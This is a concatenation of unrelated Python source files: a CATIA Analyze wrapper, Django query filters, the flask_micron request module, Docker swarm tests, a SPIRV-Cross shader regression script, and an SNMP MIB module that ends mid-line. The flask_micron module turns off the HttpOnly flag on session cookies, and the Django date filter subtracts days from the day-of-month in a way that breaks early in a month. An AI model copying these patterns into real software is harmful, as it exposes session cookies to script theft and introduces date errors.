self.analyze.WetArea def get_gravity_center(self): """ .. note:: :class: toggle CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)) | o Sub GetGravityCenter(CATSafeArrayVariant | oGravityCenterCoordinatesArray) | | Returns the gravity center coordinates of product. | | Parameters: | | Coordinates | The array storing the three gravity center coordinates. This array | must be previously initialized. | | Example: | | This example retrieves the gravity center coordinates | in | oGravityCenterCoordinatesArray from | the Analyze object associated with myProduct: | | ' Coordinates array initialization | Dim oGravityCenterCoordinatesArray ( 2 ) | ' Get value in array | Myproduct.Analyze.GetGravityCenter | oGravityCenterCoordinatesArray :return: None """ # return self.analyze.GetGravityCenter(o_gravity_center_coordinates_array) # # # # Autogenerated comment: # some methods require a system service call as the methods expects a vb array object # passed to it and there is no way to do this directly with python. In those cases the following code # should be uncommented and edited accordingly. Otherwise completely remove all this. vba_function_name = 'get_gravity_center' vba_code = """ Public Function get_gravity_center(analyze) Dim oGravityCenterCoordinatesArray (2) analyze.GetGravityCenter oGravityCenterCoordinatesArray get_gravity_center = oGravityCenterCoordinatesArray End Function """ system_service = self.application.system_service return system_service.evaluate(vba_code, 0, vba_function_name, [self.com_object]) def get_inertia(self): """ .. note:: :class: toggle CAA V5 Visual Basic Help (2020-06-11 12:40:47.360445)) | o Sub GetInertia(CATSafeArrayVariant oInertiaMatrixArray) | | Returns the inertia matrix array of product. | | Parameters: | | oInertiaMatrixArray | The array storing successively the three columns of inertia matrix. | This array must be previously initialized. | | Example: | | This example retrieves the inertia matrix components | in | oInertiaMatrixArray from | the Analyze object associated with myProduct: | | | ' Components array initialization | Dim oInertiaMatrixArray ( 8 ) | ' Get value in array | Myproduct.Analyze.GetInertia oInertiaMatrixArray | ' oInertiaMatrixArray ( 0 ) is the Ixx component | ' oInertiaMatrixArray ( 1 ) is the Ixy component | ' oInertiaMatrixArray ( 2 ) is the Ixz component | ' oInertiaMatrixArray ( 3 ) is the Iyx component | ' oInertiaMatrixArray ( 4 ) is the Iyy component | ' oInertiaMatrixArray ( 5 ) is the Iyz component | ' oInertiaMatrixArray ( 6 ) is the Izx component | ' oInertiaMatrixArray ( 7 ) is the Izy component | ' oInertiaMatrixArray ( 8 ) is the Izz component :return: tuple """ # return self.analyze.GetInertia(o_inertia_matrix_array) # # # Autogenerated comment: # some methods require a system service call as the methods expects a vb array object # passed to it and there is no way to do this directly with python. In those cases the following code # should be uncommented and edited accordingly. Otherwise completely remove all this. vba_function_name = 'get_inertia' vba_code = """ Public Function get_inertia(analyze) Dim oInertiaMatrixArray (8) analyze.GetInertia oInertiaMatrixArray get_inertia = oInertiaMatrixArray End Function """ system_service = self.application.system_service return system_service.evaluate(vba_code, 0, vba_function_name, [self.com_object]) def __repr__(self): return f'Analyze(name="{self.name}")'
python
from django.db import models from django.utils import timezone from django.db.models import Q from django_filters.rest_framework import * from django_filters import filters from django_filters.constants import EMPTY_VALUES class Filter(FilterSet): def __init__(self,form,request=None,queryset=None): queryset = form._meta.model.objects.all() if queryset is None else queryset super(Filter,self).__init__(request,queryset=queryset) self._form = form def filter_queryset(self, queryset): """ Filter the queryset with the underlying form's `cleaned_data`. You must call `is_valid()` or `errors` before calling this method. This method should be overridden if additional filtering needs to be applied to the queryset before it is cached. """ for name, value in self.form.cleaned_data.items(): if value is None: continue elif isinstance(value,models.Model): value = value.pk elif name not in self.filters: continue queryset = self.filters[name].filter(queryset, value) assert isinstance(queryset, models.QuerySet), \ "Expected '%s.%s' to return a QuerySet, but got a %s instead." \ % (type(self).__name__, name, type(queryset).__name__) return queryset class QFilter(filters.CharFilter): def __init__(self, fields, **kwargs): super(QFilter,self).__init__( **kwargs) self.fields = fields def filter(self, qs, value): if value in EMPTY_VALUES: return qs if self.distinct: qs = qs.distinct() qfilter = None for field in self.fields: if qfilter: qfilter = qfilter | Q(**{"{0}__{1}".format(*field):value}) else: qfilter = Q(**{"{0}__{1}".format(*field):value}) qs = self.get_method(qs)(qfilter) return qs class DateRangeFilter(filters.DateRangeFilter): choices = [ ('today', 'Today'), ('yesterday', 'Yesterday'), ('last_7_days', 'Past 7 days'), ('current_month','This month'), ('current_year', 'This year'), ] filters = { 'today': lambda qs, name: qs.filter(**{ '%s__gte' % name: timezone.now().date() }), 'yesterday': lambda qs, name: qs.filter(**{ '%s__gte' % name: (lambda d: timezone.datetime(d.year,d.month,d.day - 1))(timezone.now()), '%s__lt' % name: (lambda d: timezone.datetime(d.year,d.month,d.day))(timezone.now()) }), 'last_7_days': lambda qs, name: qs.filter(**{ '%s__gte' % name: (lambda d: timezone.datetime(d.year,d.month,d.day - 6))(timezone.now()) }), 'current_month': lambda qs, name: qs.filter(**{ '%s__gte' % name: (lambda d: timezone.datetime(d.year,d.month,1))(timezone.now()) }), 'current_year': lambda qs, name: qs.filter(**{ '%s__gte' % name: (lambda d: timezone.datetime(d.year,1,1))(timezone.now()) }), }
python
# -*- coding: utf-8 -*- """ flask_micron.method =================== This module provides the functionality for wrapping functions to make them work for Flask-Micron request handling. :copyright: (c) 2016 by Maurice Makaay :license: BSD, see LICENSE for more details. """ import re import sys import traceback from functools import update_wrapper import flask from flask_micron import plugin from flask_micron.errors import MicronError from flask_micron.errors import UnhandledException from flask_micron.errors import ImplementationError class MicronMethod(object): """The MicronMethod class wraps a standard function to make it work for Flask-Micron request handling. If forms the glue between the `Flask`_ app environment and Flask-Micron components. """ def __init__(self, micron, function): """Creates a new MicronMethod object. :param Micron micron: The Micron instance that creates this MicronMethod. :param function function: The function to wrap this MicronMethod around. """ update_wrapper(self, function) self.function = function self.plugins = micron.plugins self.config = MicronMethodConfig(micron.config) def configure(self, **configuration): r"""Updates the configuration for this MicronMethod instance. :param \**configuration: Configuration options that define in what way the Micron method must behave. These configuration options can be used to override the default configuration as set for the Micron object that was used to create this MicronMethod. :returns: The MicronMethod itself, useful for fluent syntax. """ self.config.configure(**configuration) return self def __call__(self): """Executes the MicronMethod. This method implements the very core of Micron request handling. Micron lets Flask take care of web server interaction, routing, context setup, etc. Flask will eventually call this method to render the route. That is when the Micron-specific request handling kicks in. :returns: The Flask Response object to return to the client. """ self._enable_cookies_for_js_clients() ctx = plugin.Context() ctx.config = self.config.flattened ctx.function = self.function try: self.plugins.call_all(ctx, 'start_request') self.plugins.call_all(ctx, 'check_access') self.plugins.call_all(ctx, 'after_check_access') self.plugins.call_one(ctx, 'read_input', 'input') self.plugins.call_all(ctx, 'normalize_input') self.plugins.call_all(ctx, 'validate_input') self.plugins.call_one(ctx, 'call_function', 'output') self.plugins.call_all(ctx, 'process_output') self.plugins.call_one(ctx, 'create_response', 'response') self.plugins.call_all(ctx, 'process_response') self.plugins.call_all(ctx, 'end_request') except MicronError: (_, error, traceback_) = sys.exc_info() self._handle_error(ctx, error, traceback_) except Exception: (_, error, traceback_) = sys.exc_info() self._handle_error(ctx, UnhandledException(error), traceback_) return ctx.response def _enable_cookies_for_js_clients(self): flask.current_app.config['SESSION_COOKIE_HTTPONLY'] = False def _handle_error(self, ctx, error, traceback_): ctx.error = error ctx.output = { 'code': type(error).__name__, 'caused_by': error.caused_by, 'description': str(error), 'details': error.details, 'trace': self._create_trace(traceback_) } self.plugins.call_one(ctx, 'create_response', 'reponse') self.plugins.call_all(ctx, 'process_error') self.plugins.call_all(ctx, 'process_response') self.plugins.call_all(ctx, 'end_request') def _create_trace(self, traceback_): ctx = flask._app_ctx_stack.top debug = ctx.app.debug if ctx else False if not debug: return None tb_list = traceback.extract_tb(traceback_) formatted = traceback.format_list(tb_list) stripped = [line.strip() for line in formatted] return stripped class MicronMethodConfig(object): """This class encapsulates the configuration options that are used for executing a MicronMethod. Within Flask-Micron, this configuration is performed at two levels: - The Micron-level configuration (defined by calling the method Micron.configure() on a Micron instance) - The MicronMethod-level configuration (defined by options that were used in the @micron.method() decorator) This class supports this multi-level configuration by making each MicronMethodConfig aware of its parent configuration (so basically, we create a linked list of configurations). Example: >>> level1 = MicronMethodConfig(x=False, y=True) >>> level2 = MicronMethodConfig(level1, x=True, y=True) >>> level3 = MicronMethodConfig(level2, y=None) >>> level1.x False >>> level2.x True >>> level3.x True >>> level2.y True >>> level3.y None """ IDENTIFIER_FORMAT = re.compile('^[a-zA-Z_][a-zA-Z0-9_]*$') def __init__(self, parent=None, **configuration): r"""Creates a new MicronMethodConfig. :param MicronMethodConfig parent: The parent of this MicronMethodConfig object. :param \**configuration: Values to instantiate this config object with. """ # Using the super __setattr__ is required to prevent endless loops, # since we implemented __setattr__/__getattr__ for this class. setmyattr = super(MicronMethodConfig, self).__setattr__ setmyattr('_parent', parent) setmyattr('_data', {}) self.configure(**configuration) def __call__(self, **configuration): return self.configure(**configuration) def configure(self, **configuration): r"""Set configuration values for this config object. :param \**configuration: Values to update this config object with. :returns: The MicronMethodConfig itself, useful for fluent syntax. """ for name, value in configuration.items(): self.set(name, value) return self def __getattr__(self, name): """For making config options available as instance attributes of the config object. """ return self.get(name) def __setattr__(self, name, value): """For making config options available as instance attributes of the config object. """ self.set(name, value) def set(self, name, value): """Set a configuration option by name. :param string name: The name of the configuration option. :param value: The value to set it to. """ self._check_option_name(name) self._data[name] = value def _check_option_name(self, name): if not self.IDENTIFIER_FORMAT.match(name): raise ImplementationError( "Invalid configuration option name '%s' used " "(only lowercase letters, numbers and underscores are allowed " "and the name must start with a letter)" % name) @property def option_names(self): """Returns a set of all configuration option names that are currently in use in the MicronMethodConfig hierarchy. """ names = set() parent = self while parent is not None: names.update(parent._data.keys()) parent = parent._parent return names @property def flattened(self): """Returns a dict of all configuration options that are currently in use in the MicronMethodConfig hierarchy. :returns: A dict, containing all configuration options. """ flattened = dict(self._data) parent = self._parent while parent: for name, value in parent._data.items(): flattened.setdefault(name, value) parent = parent._parent return flattened def get(self, name): """Retrieve a configuration value by name. When this MicronMethodConfig object does not have a value for the requested configuration option, then the parent config will be consulted. When no parent config exists, a KeyError is raised. :param string name: The name of the configuration value to retrieve. :returns: The configuration value. """ if name in self._data: return self._data[name] if self._parent is None: raise KeyError( "No value defined for configuration option '%s'" % name) return self._parent.get(name)
python
import os import testinfra.utils.ansible_runner runner = testinfra.utils.ansible_runner.AnsibleRunner(os.environ['MOLECULE_INVENTORY_FILE']) ALL_HOSTS = runner.get_hosts('all') MANAGER_HOSTS = runner.get_hosts('docker_swarm_manager') WORKER_HOSTS = runner.get_hosts('docker_swarm_worker') testinfra_hosts = ALL_HOSTS def test_docker_swarm_enabled(host): assert 'Swarm: active' in host.check_output('docker info') def test_docker_swarm_status(host): docker_info = host.check_output('docker info') hostname = host.check_output('hostname -s') if hostname in MANAGER_HOSTS: assert 'Is Manager: true' in docker_info assert 'Nodes: 4' in docker_info # the test cluster is of 4 nodes assert 'Managers: 1' in docker_info # with 1 managers elif hostname in WORKER_HOSTS: assert 'Is Manager: false' in docker_info
python
#!/usr/bin/env python3 import sys import os import subprocess import tempfile import re import itertools import hashlib import shutil import argparse def parse_stats(stats): m = re.search('([0-9]+) work registers', stats) registers = int(m.group(1)) if m else 0 m = re.search('([0-9]+) uniform registers', stats) uniform_regs = int(m.group(1)) if m else 0 m_list = re.findall('(-?[0-9]+)\s+(-?[0-9]+)\s+(-?[0-9]+)', stats) alu_short = float(m_list[1][0]) if m_list else 0 ls_short = float(m_list[1][1]) if m_list else 0 tex_short = float(m_list[1][2]) if m_list else 0 alu_long = float(m_list[2][0]) if m_list else 0 ls_long = float(m_list[2][1]) if m_list else 0 tex_long = float(m_list[2][2]) if m_list else 0 return (registers, uniform_regs, alu_short, ls_short, tex_short, alu_long, ls_long, tex_long) def get_shader_type(shader): _, ext = os.path.splitext(shader) if ext == '.vert': return '--vertex' elif ext == '.frag': return '--fragment' elif ext == '.comp': return '--compute' elif ext == '.tesc': return '--tessellation_control' elif ext == '.tese': return '--tessellation_evaluation' elif ext == '.geom': return '--geometry' else: return '' def get_shader_stats(shader): f, path = tempfile.mkstemp() os.close(f) p = subprocess.Popen(['malisc', get_shader_type(shader), '--core', 'Mali-T760', '-V', shader], stdout = subprocess.PIPE, stderr = subprocess.PIPE) stdout, stderr = p.communicate() os.remove(path) if p.returncode != 0: print(stderr.decode('utf-8')) raise OSError('malisc failed') p.wait() returned = stdout.decode('utf-8') return parse_stats(returned) def validate_shader(shader, vulkan): if vulkan: subprocess.check_call(['glslangValidator', '-V', shader]) else: subprocess.check_call(['glslangValidator', shader]) def cross_compile(shader, vulkan, spirv, eliminate, invalid_spirv): spirv_f, spirv_path = tempfile.mkstemp() glsl_f, glsl_path = tempfile.mkstemp(suffix = os.path.basename(shader)) os.close(spirv_f) os.close(glsl_f) if vulkan or spirv: vulkan_glsl_f, vulkan_glsl_path = tempfile.mkstemp(suffix = os.path.basename(shader)) os.close(vulkan_glsl_f) if spirv: subprocess.check_call(['spirv-as', '-o', spirv_path, shader]) else: subprocess.check_call(['glslangValidator', '-V', '-o', spirv_path, shader]) if not invalid_spirv: subprocess.check_call(['spirv-val', spirv_path]) spirv_cross_path = './spirv-cross' if eliminate: subprocess.check_call([spirv_cross_path, '--remove-unused-variables', '--entry', 'main', '--output', glsl_path, spirv_path]) else: subprocess.check_call([spirv_cross_path, '--entry', 'main', '--output', glsl_path, spirv_path]) # A shader might not be possible to make valid GLSL from, skip validation for this case. if (not ('nocompat' in glsl_path)) and (not spirv): validate_shader(glsl_path, False) if vulkan or spirv: if eliminate: subprocess.check_call([spirv_cross_path, '--remove-unused-variables', '--entry', 'main', '--vulkan-semantics', '--output', vulkan_glsl_path, spirv_path]) else: subprocess.check_call([spirv_cross_path, '--entry', 'main', '--vulkan-semantics', '--output', vulkan_glsl_path, spirv_path]) validate_shader(vulkan_glsl_path, vulkan) return (spirv_path, glsl_path, vulkan_glsl_path if vulkan else None) def md5_for_file(path): md5 = hashlib.md5() with open(path, 'rb') as f: for chunk in iter(lambda: f.read(8192), b''): md5.update(chunk) return md5.digest() def make_reference_dir(path): base = os.path.dirname(path) if not os.path.exists(base): os.makedirs(base) def reference_path(directory, relpath): split_paths = os.path.split(directory) reference_dir = os.path.join(split_paths[0], 'reference/') reference_dir = os.path.join(reference_dir, split_paths[1]) return os.path.join(reference_dir, relpath) def regression_check(shader, glsl, update, keep): reference = reference_path(shader[0], shader[1]) joined_path = os.path.join(shader[0], shader[1]) print('Reference shader path:', reference) if os.path.exists(reference): if md5_for_file(glsl) != md5_for_file(reference): if update: print('Generated GLSL has changed for {}!'.format(reference)) # If we expect changes, update the reference file. if os.path.exists(reference): os.remove(reference) make_reference_dir(reference) shutil.move(glsl, reference) else: print('Generated GLSL in {} does not match reference {}!'.format(glsl, reference)) # Otherwise, fail the test. Keep the shader file around so we can inspect. if not keep: os.remove(glsl) sys.exit(1) else: os.remove(glsl) else: print('Found new shader {}. Placing GLSL in {}'.format(joined_path, reference)) make_reference_dir(reference) shutil.move(glsl, reference) def shader_is_vulkan(shader): return '.vk.' in shader def shader_is_desktop(shader): return '.desktop.' in shader def shader_is_eliminate_dead_variables(shader): return '.noeliminate.' not in shader def shader_is_spirv(shader): return '.asm.' in shader def shader_is_invalid_spirv(shader): return '.invalid.' in shader def test_shader(stats, shader, update, keep): joined_path = os.path.join(shader[0], shader[1]) vulkan = shader_is_vulkan(shader[1]) desktop = shader_is_desktop(shader[1]) eliminate = shader_is_eliminate_dead_variables(shader[1]) is_spirv = shader_is_spirv(shader[1]) invalid_spirv = shader_is_invalid_spirv(shader[1]) print('Testing shader:', joined_path) spirv, glsl, vulkan_glsl = cross_compile(joined_path, vulkan, is_spirv, eliminate, invalid_spirv) # Only test GLSL stats if we have a shader following GL semantics. if stats and (not vulkan) and (not is_spirv) and (not desktop): cross_stats = get_shader_stats(glsl) regression_check(shader, glsl, update, keep) if vulkan_glsl: regression_check((shader[0], shader[1] + '.vk'), vulkan_glsl, update, keep) os.remove(spirv) if stats and (not vulkan) and (not is_spirv) and (not desktop): pristine_stats = get_shader_stats(joined_path) a = [] a.append(shader[1]) for i in pristine_stats: a.append(str(i)) for i in cross_stats: a.append(str(i)) print(','.join(a), file = stats) def test_shaders_helper(stats, shader_dir, update, malisc, keep): for root, dirs, files in os.walk(os.path.join(shader_dir)): for i in files: path = os.path.join(root, i) relpath = os.path.relpath(path, shader_dir) test_shader(stats, (shader_dir, relpath), update, keep) def test_shaders(shader_dir, update, malisc, keep): if malisc: with open('stats.csv', 'w') as stats: print('Shader,OrigRegs,OrigUniRegs,OrigALUShort,OrigLSShort,OrigTEXShort,OrigALULong,OrigLSLong,OrigTEXLong,CrossRegs,CrossUniRegs,CrossALUShort,CrossLSShort,CrossTEXShort,CrossALULong,CrossLSLong,CrossTEXLong', file = stats) test_shaders_helper(stats, shader_dir, update, malisc, keep) else: test_shaders_helper(None, shader_dir, update, malisc, keep) def main(): parser = argparse.ArgumentParser(description = 'Script for regression testing.') parser.add_argument('folder', help = 'Folder containing shader files to test.') parser.add_argument('--update', action = 'store_true', help = 'Updates reference files if there is a mismatch. Use when legitimate changes in output is found.') parser.add_argument('--keep', action = 'store_true', help = 'Leave failed GLSL shaders on disk if they fail regression. Useful for debugging.') parser.add_argument('--malisc', action = 'store_true', help = 'Use malisc offline compiler to determine static cycle counts before and after spirv-cross.') args = parser.parse_args() if not args.folder: sys.stderr.write('Need shader folder.\n') sys.exit(1) test_shaders(args.folder, args.update, args.malisc, args.keep) if args.malisc: print('Stats in stats.csv!') print('Tests completed!') if __name__ == '__main__': main()
python
# # PySNMP MIB module HPN-ICF-FR-QOS-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/HPN-ICF-FR-QOS-MIB # Produced by pysmi-0.3.4 at Mon Apr 29 19:26:51 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection") hpnicfQoS, = mibBuilder.importSymbols("HPN-ICF-OID-MIB", "hpnicfQoS") ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex") NotificationGroup, ModuleCompliance, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance", "ObjectGroup") Counter32, NotificationType, Integer32, ObjectIdentity, MibIdentifier, ModuleIdentity, iso, Gauge32, Unsigned32, TimeTicks, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, Bits, IpAddress = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "NotificationType", "Integer32", "ObjectIdentity", "MibIdentifier", "ModuleIdentity", "iso", "Gauge32", "Unsigned32", "TimeTicks", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Bits", "IpAddress") DisplayString, TextualConvention, RowStatus = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention", "RowStatus") hpnicfFrQoSMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3)) if mibBuilder.loadTexts: hpnicfFrQoSMib.setLastUpdated('200407120000Z') if mibBuilder.loadTexts: hpnicfFrQoSMib.setOrganization('') class HpnicfCirAllowDirection(TextualConvention, Integer32): status = 'current' subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3)) namedValues = NamedValues(("inbound", 1), ("outbound", 2), ("inboundAndOutbound", 3)) hpnicfFrQoSObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1)) hpnicfFrClassObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1)) hpnicfFrClassIndexNext = MibScalar((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 1), Integer32()).setMaxAccess("readonly") if mibBuilder.loadTexts: hpnicfFrClassIndexNext.setStatus('current') hpnicfFrClassCfgInfoTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 2), ) if mibBuilder.loadTexts: hpnicfFrClassCfgInfoTable.setStatus('current') hpnicfFrClassCfgInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 2, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfFrClassIndex")) if mibBuilder.loadTexts: hpnicfFrClassCfgInfoEntry.setStatus('current') hpnicfFrClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 2, 1, 1), Integer32()) if mibBuilder.loadTexts: hpnicfFrClassIndex.setStatus('current') hpnicfFrClassName = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 2, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 31))).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfFrClassName.setStatus('current') hpnicfFrClassRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 2, 1, 3), RowStatus()).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfFrClassRowStatus.setStatus('current') hpnicfCirAllowCfgInfoTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 3), ) if mibBuilder.loadTexts: hpnicfCirAllowCfgInfoTable.setStatus('current') hpnicfCirAllowCfgInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 3, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfCirAllowFrClassIndex"), (0, "HPN-ICF-FR-QOS-MIB", "hpnicfCirAllowDirection")) if mibBuilder.loadTexts: hpnicfCirAllowCfgInfoEntry.setStatus('current') hpnicfCirAllowFrClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 3, 1, 1), Integer32()) if mibBuilder.loadTexts: hpnicfCirAllowFrClassIndex.setStatus('current') hpnicfCirAllowDirection = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 3, 1, 2), HpnicfCirAllowDirection()) if mibBuilder.loadTexts: hpnicfCirAllowDirection.setStatus('current') hpnicfCirAllowValue = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 45000000))).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfCirAllowValue.setStatus('current') hpnicfCirAllowRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 3, 1, 4), RowStatus()).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfCirAllowRowStatus.setStatus('current') hpnicfCirCfgInfoTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 4), ) if mibBuilder.loadTexts: hpnicfCirCfgInfoTable.setStatus('current') hpnicfCirCfgInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 4, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfCirFrClassIndex")) if mibBuilder.loadTexts: hpnicfCirCfgInfoEntry.setStatus('current') hpnicfCirFrClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 4, 1, 1), Integer32()) if mibBuilder.loadTexts: hpnicfCirFrClassIndex.setStatus('current') hpnicfCirValue = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 4, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1000, 45000000))).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfCirValue.setStatus('current') hpnicfCirRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 4, 1, 3), RowStatus()).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfCirRowStatus.setStatus('current') hpnicfIfApplyFrClassTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 5), ) if mibBuilder.loadTexts: hpnicfIfApplyFrClassTable.setStatus('current') hpnicfIfApplyFrClassEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 5, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfIfApplyFrClassIfIndex")) if mibBuilder.loadTexts: hpnicfIfApplyFrClassEntry.setStatus('current') hpnicfIfApplyFrClassIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 5, 1, 1), Integer32()) if mibBuilder.loadTexts: hpnicfIfApplyFrClassIfIndex.setStatus('current') hpnicfIfApplyFrClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 5, 1, 2), Integer32()).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfIfApplyFrClassIndex.setStatus('current') hpnicfIfApplyFrClassRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 5, 1, 3), RowStatus()).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfIfApplyFrClassRowStatus.setStatus('current') hpnicfPvcApplyFrClassTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 6), ) if mibBuilder.loadTexts: hpnicfPvcApplyFrClassTable.setStatus('current') hpnicfPvcApplyFrClassEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 6, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfPvcApplyFrClassIfIndex"), (0, "HPN-ICF-FR-QOS-MIB", "hpnicfPvcApplyFrClassDlciNum")) if mibBuilder.loadTexts: hpnicfPvcApplyFrClassEntry.setStatus('current') hpnicfPvcApplyFrClassIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 6, 1, 1), Integer32()) if mibBuilder.loadTexts: hpnicfPvcApplyFrClassIfIndex.setStatus('current') hpnicfPvcApplyFrClassDlciNum = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 6, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(16, 1007))) if mibBuilder.loadTexts: hpnicfPvcApplyFrClassDlciNum.setStatus('current') hpnicfPvcApplyFrClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 6, 1, 3), Integer32()).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfPvcApplyFrClassIndex.setStatus('current') hpnicfPvcApplyFrClassRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 6, 1, 4), RowStatus()).setMaxAccess("readcreate") if mibBuilder.loadTexts: hpnicfPvcApplyFrClassRowStatus.setStatus('current') hpnicfFrPvcBandwidthTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 7), ) if mibBuilder.loadTexts: hpnicfFrPvcBandwidthTable.setStatus('current') hpnicfFrPvcBandwidthEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 7, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", "hpnicfPvcApplyFrClassIfIndex"), (0, "HPN-ICF-FR-QOS-MIB", "hpnicfPvcApplyFrClassDlciNum")) if mibBuilder.loadTexts: hpnicfFrPvcBandwidthEntry.setStatus('current') hpnicfFrPvcBandwidthMaxReservedBW = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 7, 1, 1), Integer32()).setMaxAccess("readonly") if mibBuilder.loadTexts: hpnicfFrPvcBandwidthMaxReservedBW.setStatus('current') hpnicfFrPvcBandwidthAvailable = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 1, 7, 1, 2), Integer32()).setMaxAccess("readonly") if mibBuilder.loadTexts: hpnicfFrPvcBandwidthAvailable.setStatus('current') hpnicfRTPQoSObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2)) hpnicfRTPFrClassApplyTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1), ) if mibBuilder.loadTexts: hpnicfRTPFrClassApplyTable.setStatus('current') hpnicfRTPFrClassApplyEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 15, 8, 32, 3, 1, 2, 1, 1), ).setIndexNames((0, "HPN-ICF-FR-QOS-MIB", 